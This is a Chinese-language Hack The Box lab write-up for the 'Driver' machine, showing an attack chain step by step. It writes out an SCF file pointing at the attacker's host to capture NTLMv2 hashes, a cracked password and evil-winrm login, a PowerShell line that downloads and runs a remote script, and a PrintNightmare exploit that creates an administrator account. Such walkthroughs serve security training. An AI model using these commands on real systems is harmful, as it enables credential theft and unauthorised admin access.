[Hack The Box] HTB—Driver walkthrough

2023-10-24 13:30
文章标签 htb driver box hack walkthrough

本文主要是介绍[Hack The Box] HTB—Driver walkthrough,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

[Hack The Box] HTB—Driver walkthrough

HTB—Driver

  • [Hack The Box] HTB—Driver walkthrough
  • 一、信息搜集
  • 二、SMB Share – SCF File Attacks && Net-NTLMv2 hash grabbing
    • NTLMv2
    • evil-winrm
  • 三、提权

machine : Hack The Box——Driver

image-20220222110952849

一、信息搜集

nmap -sV 10.10.11.106

image-20220222111406885

nmap -sC -sV -n -T5 -p 135,80,445 10.10.11.106

得到

PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-02-22T10:34:47
|_  start_date: 2022-02-22T04:38:42
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 7h17m39s, deviation: 0s, median: 7h17m38s

80端口需要密码登陆

猜admin/admin登陆

image-20220222113120317

firmware update有个上传口,但普通文件上传漏洞并不适用

image-20220222163250970

二、SMB Share – SCF File Attacks && Net-NTLMv2 hash grabbing

可以看看smb服务有什么漏洞

image-20220222163920664

看这篇博客,可以利用smb文件共享

https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

首先创建一个shell.scf文件

SCF(Shell 命令文件)文件可用于执行一组有限的操作,例如显示 Windows 桌面或打开 Windows 资源管理器

[Shell]
Command=2
IconFile=\\10.10.16.3[my ip]\share\icon.ico
[Taskbar]
Command=ToggleDesktop

然后使用responder监听连接htb的那个网卡,捕获浏览共享的用户的哈希值。

responder -wrf --lm -v -I tun0

然后去之前找到的上传点上传我们的shell.scf文件

image-20220222165959482

NTLMv2

当目标浏览共享时,将自动会从系统建立网络连接,连接到包含在SCF文件内的UNC路径。Windows将尝试使用用户名和密码对该共享进行身份验证。在验证过程中,随机的8字节质询密钥会从服务器发送到客户端,散列后的NTLM / LANMAN密码再次使用这个质询密钥进行加密。Responder将捕获NTLMv2哈希。

[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:98659cf5fc99e040:11A08E337555F71AEB163115637B06D0:0101000000000000EBC3A76BEE27D801D68821B0D4FBE03000000000020000000000000000000000      

image-20220222165825721

用hashcat爆破NTLMv2哈希

hashcat.exe  -a 0 -m 5600 hash.txt D:\tool\hvv\字典\rockyou.txt

image-20220222142107074

得到用户密码

TONY/liltony

evil-winrm

拿到用户密码的凭证之后,如果winrm服务(通常是5985端口)开着,我们可以用evil-winrm连接

nmap -sC -sV -n -T5 -p 5985 10.10.11.106PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

通过Evil-WinRM工具连接远程Windows服务器的WinRM服务并获得交互式PowerShell

evil-winrm -i 10.10.11.106 -u TONY -p liltony

拿到TONY用户的flag afeb7d0505e0be6dcbba4ae02339c641

image-20220222160148178

三、提权

get-process

获取靶机的进程,在进程中可以看到spoolsv在运行

image-20220222172436722

Print Spooler 是 Windows 打印后台处理服务,在 Windows 平台使用打印机的必要服务。攻击者可绕过 RpcAddPrinterDriver 的身份验证,在打印服务器中安装恶意驱动程序。Windows 域环境中普通帐户就能利用此漏洞。

所以可以使用漏洞CVE-2021-1675提权(https://github.com/calebstewart/CVE-2021-1675)

在本地使用python3架设一个http服务器

python -m http.server 8080

然后远程加载ps脚本

IEX(New-Object Net.WebClient).DownloadString("http://10.10.16.3:8080/CVE-2021-1675.ps1")
或者用evil-winrm的upload命令
upload PATH/CVE-2021-1675.ps1

image-20220222150533078

直接导入脚本会报错

*Evil-WinRM* PS C:\Users\tony\Documents> Import-Module ./CVE-2021-1675.ps1File C:\Users\tony\Documents\CVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module ./CVE-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand

running scripts is disabled on this system

需要设置execution policy为Unrestricted

Get-ExecutionPolicy
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;

image-20220222161035983

其实!我发现evil-winrm自带这个ps脚本,menu就可以看到

image-20220222155229539

使用脚本添加一个新用户

Invoke-Nightmare -DriverName "DRIVER" -NewUser "xiaoz" -NewPassword "xiaoz"     //DriverName也可以不加
net localgroup administrators

image-20220222155251261

image-20220222155309746

用新建的管理员用户重新登陆

evil-winrm -i 10.10.11.106 -u xiaoz -p xiaoz
cd C:\Users\Administrator\Desktop
ls
cat root.txt

image-20220222155659863

拿到管理员flag 8d8594e897170bfbbd391ba2ef39c071

image-20220222160125974

参考wp:

https://zhuanlan.zhihu.com/p/438040496

https://brainful.blog/2021/11/18/driver/

这篇关于[Hack The Box] HTB—Driver walkthrough的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/275486

相关文章

论文翻译:ICLR-2024 PROVING TEST SET CONTAMINATION IN BLACK BOX LANGUAGE MODELS

PROVING TEST SET CONTAMINATION IN BLACK BOX LANGUAGE MODELS https://openreview.net/forum?id=KS8mIvetg2 验证测试集污染在黑盒语言模型中 文章目录 验证测试集污染在黑盒语言模型中摘要1 引言 摘要 大型语言模型是在大量互联网数据上训练的,这引发了人们的担忧和猜测,即它们可能已

SQLException: No Suitable Driver Found - 完美解决方法详解

🚨 SQLException: No Suitable Driver Found - 完美解决方法详解 🚨 **🚨 SQLException: No Suitable Driver Found - 完美解决方法详解 🚨****摘要 📝****引言 🎯****正文 📚****1. 问题概述 ❗****2. JDBC 驱动程序的工作原理 🔧****3. 错误的根本原因 🕵️**

HTB-You know 0xDiablos

引言 项目概述:HTB的EASY难度 PWN靶机 You know 0xDiablos https://app.hackthebox.com/challenges/106 本文详细解释了溢出payload的结构以及为什么要这样构造,友好的为想要入手PWN的朋友解释了原理技术点涉及: 32位linux逆向、32位程序调用、栈溢出目标与读者:网络安全兴趣爱好者、PWN新手 基本情况 运行看看

SpringBoot启动报错Failed to determine a suitable driver class

两种解决办法 1.在Application类上加 ` @EnableAutoConfiguration(exclude={DataSourceAutoConfiguration.class}) package com.example.demo3;import org.springframework.boot.SpringApplication;import org.springframewo

linux驱动模型 -- bus,device,device_driver之间的关系

Linux 设备驱动模型中,按照层次的组织结构,抽象成总线(struct bus_type),设备(struct device),驱动(struct device_driver)的层次组织形式,这是最原始的抽象结构,在此基础之上,根据不同类型的总线/设备/驱动,有形成了更高层次的组织结构,如 virtio总线(struct bus_type virtio_bus),virtio设备(

JavaBug系列- Failed to load driver class com.mysql.cj.jdbc.Driver in either of HikariConfig class load

JavaBug系列之Mysql驱动问题 Java医生一、关于错误信息二、如何解决问题 Java医生 本系列记录常见Bug,以及诊断过程和原因 Java/一对一零基础辅导/企业项目一对一辅导/日常Bug解决/代码讲解/毕业设计等 V:study_51ctofx 一、关于错误信息 APPLICATION FAILED TO START Description: Fai

UTON HACK 4.0 黑客马拉松大赛在马来西亚引起巨大反响

自第四届UTON HACK黑客马拉松大赛开启报名以来,吸引了全世界范围内区块链技术精英的广泛参与,在东南亚地区特别是马来西亚引起了巨大反响。 近日,马来西亚主流媒体Delight Media Malaysia对本次黑客马拉松大赛的协办单位马来西亚何氏全球总商会、UM公司进行了专访。 前排左一起是何致呈、何德成、何伟贤、尼克及马克。 (Delight Media Malaysia摄) 马来

java.lang.ClassNotFoundException: com.mysql.jdbc.Driver问题

执行Class.forName(driverName)时报告此异常! Java项目中明明已经添加了MySQL-connector驱动,还是报java.lang.ClassNotFoundException: com.mysql.jdbc.Driver找不到类文件的异常, 排查了很久,原来是从jdbc.properties配置文件中读取的drivername末尾多了一个空格, 这种错误及其隐蔽,

[UVM]6.component driver monitor sequencer agent scoreboard env test

1.知识点回顾 (1)component需要有parent,因为参加构成组件,所以需要(继承); (2)object与component之间间隔report_object。 2.组件家族 (1)构建寄存器模型 :uvm_reg_predictor;激励器:driver/random_stimulus/sequencer_base/sequencer;监测器:monitor;

VS2012配置Opengl以及“无法解析的外部符号 __imp____glutInitWithExit@12,该符号在函数 _glutInit_ATEXIT_HACK@8 中被引用”问题

1、配置步骤 (1)首先下载glut相关文件,下载地址: http://download.csdn.net/detail/u013383042/9329101 (2)glut.h:头文件,将其复制到 D:\Program Files (x86)\Microsoft Visual Studio 11.0\VC\include\gl (原本没有gl文件夹,需要手动新建一个gl文件夹) (3)